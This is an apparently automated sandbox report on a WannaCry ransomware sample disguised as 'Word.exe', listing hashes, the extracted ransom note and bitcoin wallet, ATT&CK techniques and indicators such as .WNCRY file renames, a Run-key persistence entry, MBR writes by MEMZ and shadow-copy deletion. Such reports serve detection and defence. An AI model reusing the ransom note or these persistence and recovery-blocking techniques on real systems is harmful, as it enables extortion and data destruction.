wannacry | acd5f35bfcc91c197d8ea08afe588454233114500255ed842b0589dc194ec466

Analysis

max time kernel
572s
max time network
599s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
16-03-2023 04:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Word.exe
Size

3.6MB
MD5

e8340564caba7a2635af2c79cb7103eb
SHA1

8c62c79508abe5ffa36608d1846dcb20b2a27137
SHA256

acd5f35bfcc91c197d8ea08afe588454233114500255ed842b0589dc194ec466
SHA512

b6dc6dfeff210222ee904ad9c8dc832e4bf9c27a84298d2817e320bd9308e6d647a5efcf6845a0ed2b0cebdb6539257cd07428bbdce3d5d5db23e8614503d9d2
SSDEEP

98304:/uWtmPx3xiobns6osz1gyQ4BL995Bt9JWpVi6q:/9m5hi0HBtQ4P95L9g3i6q

Score

10^/10

wannacry bootkit discovery persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 22 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\LockGroup.tif.WNCRYT => C:\Users\Admin\Pictures\LockGroup.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\SkipExport.tif.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\SubmitExport.tif.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\CompareCopy.tiff	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRYT => C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRYT => C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\LockGroup.tif.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRYT => C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\InvokeReset.tif.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\InvokeReset.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\LockGroup.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Pictures\SkipExport.tif.WNCRYT => C:\Users\Admin\Pictures\SkipExport.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\SkipExport.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Pictures\SubmitExport.tif.WNCRYT => C:\Users\Admin\Pictures\SubmitExport.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\SubmitExport.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Pictures\InvokeReset.tif.WNCRYT => C:\Users\Admin\Pictures\InvokeReset.tif.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MEMZ.exeMEMZ.exeWord.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	MEMZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	MEMZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	Word.exe

Drops startup file 2 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDD537.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDD55D.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 64 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exetaskdl.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exe@WanaDecryptor@.exe@WanaDecryptor@.exetaskhsvc.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskse.exe@WanaDecryptor@.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exetaskse.exe

pid	process
1572	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
1464	taskdl.exe
4236	MEMZ.exe
1336	MEMZ.exe
1844	MEMZ.exe
4108	MEMZ.exe
3696	MEMZ.exe
812	MEMZ.exe
4828	MEMZ.exe
2088	@WanaDecryptor@.exe
2500	@WanaDecryptor@.exe
4736	taskhsvc.exe
3348	taskdl.exe
4544	taskse.exe
1284	@WanaDecryptor@.exe
5176	taskdl.exe
1656	taskse.exe
4332	@WanaDecryptor@.exe
3764	taskdl.exe
5180	taskse.exe
2532	@WanaDecryptor@.exe
5988	taskdl.exe
6044	taskse.exe
5012	@WanaDecryptor@.exe
5388	taskse.exe
4256	@WanaDecryptor@.exe
5768	taskdl.exe
4904	@WanaDecryptor@.exe
2628	taskse.exe
2632	taskdl.exe
4020	taskse.exe
6052	@WanaDecryptor@.exe
5988	taskdl.exe
4252	taskse.exe
1468	@WanaDecryptor@.exe
5476	taskdl.exe
5580	taskse.exe
5612	@WanaDecryptor@.exe
2716	taskdl.exe
1736	taskse.exe
2852	@WanaDecryptor@.exe
1636	taskdl.exe
748	taskse.exe
4792	@WanaDecryptor@.exe
1328	taskdl.exe
4972	@WanaDecryptor@.exe
452	taskse.exe
1892	taskdl.exe
4944	@WanaDecryptor@.exe
632	taskse.exe
6032	taskdl.exe
704	taskse.exe
3880	@WanaDecryptor@.exe
5652	taskdl.exe
5868	taskse.exe
5328	@WanaDecryptor@.exe
5928	taskdl.exe
3524	taskse.exe
320	@WanaDecryptor@.exe
1452	taskdl.exe
7084	@WanaDecryptor@.exe
7040	taskse.exe
7048	taskdl.exe
848	taskse.exe

Loads dropped DLL 8 IoCs

Processes:

taskhsvc.exe

pid process

4736 taskhsvc.exe
4736 taskhsvc.exe
4736 taskhsvc.exe
4736 taskhsvc.exe
4736 taskhsvc.exe
4736 taskhsvc.exe
4736 taskhsvc.exe
4736 taskhsvc.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1172 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 37.123.163.58

pid	process
4736	taskhsvc.exe
4736	taskhsvc.exe
4736	taskhsvc.exe
4736	taskhsvc.exe
4736	taskhsvc.exe
4736	taskhsvc.exe
4736	taskhsvc.exe
4736	taskhsvc.exe

pid	process
1172	icacls.exe

description	ioc
Destination IP	37.123.163.58

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\qpzmehtw499 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\""	reg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

MEMZ.exe

description ioc process

File opened for modification \??\PhysicalDrive0 MEMZ.exe
Drops file in System32 directory 1 IoCs

Processes:

mmc.exe

description ioc process

File opened for modification C:\Windows\System32\devmgmt.msc mmc.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	MEMZ.exe

description	ioc	process
File opened for modification	C:\Windows\System32\devmgmt.msc	mmc.exe

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@WanaDecryptor@.exe@WanaDecryptor@.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp"	@WanaDecryptor@.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp"	@WanaDecryptor@.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\55700faf-e542-4ee0-894d-a72871b5f06c.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230316052823.pma	setup.exe

Drops file in Windows directory 57 IoCs

Processes:

mmc.exe

description	ioc	process
File created	C:\Windows\INF\c_fsinfrastructure.PNF	mmc.exe
File created	C:\Windows\INF\c_fscompression.PNF	mmc.exe
File created	C:\Windows\INF\digitalmediadevice.PNF	mmc.exe
File created	C:\Windows\INF\c_fsreplication.PNF	mmc.exe
File created	C:\Windows\INF\c_holographic.PNF	mmc.exe
File created	C:\Windows\INF\rdcameradriver.PNF	mmc.exe
File created	C:\Windows\INF\wsdprint.PNF	mmc.exe
File created	C:\Windows\INF\c_receiptprinter.PNF	mmc.exe
File created	C:\Windows\INF\c_ucm.PNF	mmc.exe
File created	C:\Windows\INF\c_fsvirtualization.PNF	mmc.exe
File created	C:\Windows\INF\c_apo.PNF	mmc.exe
File created	C:\Windows\INF\PerceptionSimulationSixDof.PNF	mmc.exe
File created	C:\Windows\INF\c_volume.PNF	mmc.exe
File created	C:\Windows\INF\c_swcomponent.PNF	mmc.exe
File created	C:\Windows\INF\c_computeaccelerator.PNF	mmc.exe
File created	C:\Windows\INF\c_fscopyprotection.PNF	mmc.exe
File created	C:\Windows\INF\c_fssecurityenhancer.PNF	mmc.exe
File created	C:\Windows\INF\c_magneticstripereader.PNF	mmc.exe
File created	C:\Windows\INF\c_display.PNF	mmc.exe
File created	C:\Windows\INF\c_fsquotamgmt.PNF	mmc.exe
File created	C:\Windows\INF\remoteposdrv.PNF	mmc.exe
File created	C:\Windows\INF\c_extension.PNF	mmc.exe
File created	C:\Windows\INF\dc1-controller.PNF	mmc.exe
File created	C:\Windows\INF\c_processor.PNF	mmc.exe
File created	C:\Windows\INF\c_fsphysicalquotamgmt.PNF	mmc.exe
File created	C:\Windows\INF\c_camera.PNF	mmc.exe
File created	C:\Windows\INF\c_fscfsmetadataserver.PNF	mmc.exe
File created	C:\Windows\INF\miradisp.PNF	mmc.exe
File created	C:\Windows\INF\c_sslaccel.PNF	mmc.exe
File created	C:\Windows\INF\c_media.PNF	mmc.exe
File created	C:\Windows\INF\c_fscontinuousbackup.PNF	mmc.exe
File created	C:\Windows\INF\rawsilo.PNF	mmc.exe
File created	C:\Windows\INF\c_fsopenfilebackup.PNF	mmc.exe
File created	C:\Windows\INF\c_mcx.PNF	mmc.exe
File created	C:\Windows\INF\c_smrdisk.PNF	mmc.exe
File created	C:\Windows\INF\ts_generic.PNF	mmc.exe
File created	C:\Windows\INF\c_firmware.PNF	mmc.exe
File created	C:\Windows\INF\c_scmdisk.PNF	mmc.exe
File created	C:\Windows\INF\c_scmvolume.PNF	mmc.exe
File created	C:\Windows\INF\c_netdriver.PNF	mmc.exe
File created	C:\Windows\INF\c_barcodescanner.PNF	mmc.exe
File created	C:\Windows\INF\c_fsactivitymonitor.PNF	mmc.exe
File created	C:\Windows\INF\c_fshsm.PNF	mmc.exe
File created	C:\Windows\INF\c_smrvolume.PNF	mmc.exe
File created	C:\Windows\INF\c_proximity.PNF	mmc.exe
File created	C:\Windows\INF\c_cashdrawer.PNF	mmc.exe
File created	C:\Windows\INF\c_fscontentscreener.PNF	mmc.exe
File created	C:\Windows\INF\c_fssystem.PNF	mmc.exe
File created	C:\Windows\INF\xusb22.PNF	mmc.exe
File created	C:\Windows\INF\c_fsundelete.PNF	mmc.exe
File created	C:\Windows\INF\c_fssystemrecovery.PNF	mmc.exe
File created	C:\Windows\INF\c_diskdrive.PNF	mmc.exe
File created	C:\Windows\INF\c_monitor.PNF	mmc.exe
File created	C:\Windows\INF\c_fsantivirus.PNF	mmc.exe
File created	C:\Windows\INF\c_linedisplay.PNF	mmc.exe
File created	C:\Windows\INF\oposdrv.PNF	mmc.exe
File created	C:\Windows\INF\c_fsencryption.PNF	mmc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 23 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Taskmgr.exemmc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	mmc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 2 IoCs

Processes:

msedge.exeMEMZ.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	MEMZ.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2880 reg.exe

pid	process
2880	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

MEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exe

pid	process
1336	MEMZ.exe
1336	MEMZ.exe
1844	MEMZ.exe
1844	MEMZ.exe
1336	MEMZ.exe
1336	MEMZ.exe
1336	MEMZ.exe
1336	MEMZ.exe
1844	MEMZ.exe
1844	MEMZ.exe
4108	MEMZ.exe
4108	MEMZ.exe
1844	MEMZ.exe
1844	MEMZ.exe
1336	MEMZ.exe
1336	MEMZ.exe
1844	MEMZ.exe
3696	MEMZ.exe
1844	MEMZ.exe
3696	MEMZ.exe
4108	MEMZ.exe
4108	MEMZ.exe
812	MEMZ.exe
812	MEMZ.exe
1336	MEMZ.exe
1336	MEMZ.exe
3696	MEMZ.exe
3696	MEMZ.exe
4108	MEMZ.exe
4108	MEMZ.exe
1844	MEMZ.exe
1844	MEMZ.exe
812	MEMZ.exe
812	MEMZ.exe
4108	MEMZ.exe
4108	MEMZ.exe
3696	MEMZ.exe
3696	MEMZ.exe
1336	MEMZ.exe
1336	MEMZ.exe
812	MEMZ.exe
812	MEMZ.exe
1844	MEMZ.exe
1844	MEMZ.exe
812	MEMZ.exe
812	MEMZ.exe
1336	MEMZ.exe
1336	MEMZ.exe
3696	MEMZ.exe
3696	MEMZ.exe
4108	MEMZ.exe
4108	MEMZ.exe
1844	MEMZ.exe
1844	MEMZ.exe
3696	MEMZ.exe
3696	MEMZ.exe
1336	MEMZ.exe
1336	MEMZ.exe
812	MEMZ.exe
812	MEMZ.exe
4108	MEMZ.exe
4108	MEMZ.exe
812	MEMZ.exe
812	MEMZ.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Taskmgr.exe

pid process

5392 Taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 60 IoCs

Processes:

msedge.exe

pid	process
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe
1324	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskse.exeWMIC.exevssvc.exetaskse.exetaskse.exeTaskmgr.exetaskse.exeAUDIODG.EXEtaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeTcbPrivilege	4544	taskse.exe
Token: SeTcbPrivilege	4544	taskse.exe
Token: SeIncreaseQuotaPrivilege	320	WMIC.exe
Token: SeSecurityPrivilege	320	WMIC.exe
Token: SeTakeOwnershipPrivilege	320	WMIC.exe
Token: SeLoadDriverPrivilege	320	WMIC.exe
Token: SeSystemProfilePrivilege	320	WMIC.exe
Token: SeSystemtimePrivilege	320	WMIC.exe
Token: SeProfSingleProcessPrivilege	320	WMIC.exe
Token: SeIncBasePriorityPrivilege	320	WMIC.exe
Token: SeCreatePagefilePrivilege	320	WMIC.exe
Token: SeBackupPrivilege	320	WMIC.exe
Token: SeRestorePrivilege	320	WMIC.exe
Token: SeShutdownPrivilege	320	WMIC.exe
Token: SeDebugPrivilege	320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	320	WMIC.exe
Token: SeRemoteShutdownPrivilege	320	WMIC.exe
Token: SeUndockPrivilege	320	WMIC.exe
Token: SeManageVolumePrivilege	320	WMIC.exe
Token: 33	320	WMIC.exe
Token: 34	320	WMIC.exe
Token: 35	320	WMIC.exe
Token: 36	320	WMIC.exe
Token: SeIncreaseQuotaPrivilege	320	WMIC.exe
Token: SeSecurityPrivilege	320	WMIC.exe
Token: SeTakeOwnershipPrivilege	320	WMIC.exe
Token: SeLoadDriverPrivilege	320	WMIC.exe
Token: SeSystemProfilePrivilege	320	WMIC.exe
Token: SeSystemtimePrivilege	320	WMIC.exe
Token: SeProfSingleProcessPrivilege	320	WMIC.exe
Token: SeIncBasePriorityPrivilege	320	WMIC.exe
Token: SeCreatePagefilePrivilege	320	WMIC.exe
Token: SeBackupPrivilege	320	WMIC.exe
Token: SeRestorePrivilege	320	WMIC.exe
Token: SeShutdownPrivilege	320	WMIC.exe
Token: SeDebugPrivilege	320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	320	WMIC.exe
Token: SeRemoteShutdownPrivilege	320	WMIC.exe
Token: SeUndockPrivilege	320	WMIC.exe
Token: SeManageVolumePrivilege	320	WMIC.exe
Token: 33	320	WMIC.exe
Token: 34	320	WMIC.exe
Token: 35	320	WMIC.exe
Token: 36	320	WMIC.exe
Token: SeBackupPrivilege	2312	vssvc.exe
Token: SeRestorePrivilege	2312	vssvc.exe
Token: SeAuditPrivilege	2312	vssvc.exe
Token: SeTcbPrivilege	1656	taskse.exe
Token: SeTcbPrivilege	1656	taskse.exe
Token: SeTcbPrivilege	5180	taskse.exe
Token: SeTcbPrivilege	5180	taskse.exe
Token: SeDebugPrivilege	5392	Taskmgr.exe
Token: SeSystemProfilePrivilege	5392	Taskmgr.exe
Token: SeCreateGlobalPrivilege	5392	Taskmgr.exe
Token: SeTcbPrivilege	6044	taskse.exe
Token: SeTcbPrivilege	6044	taskse.exe
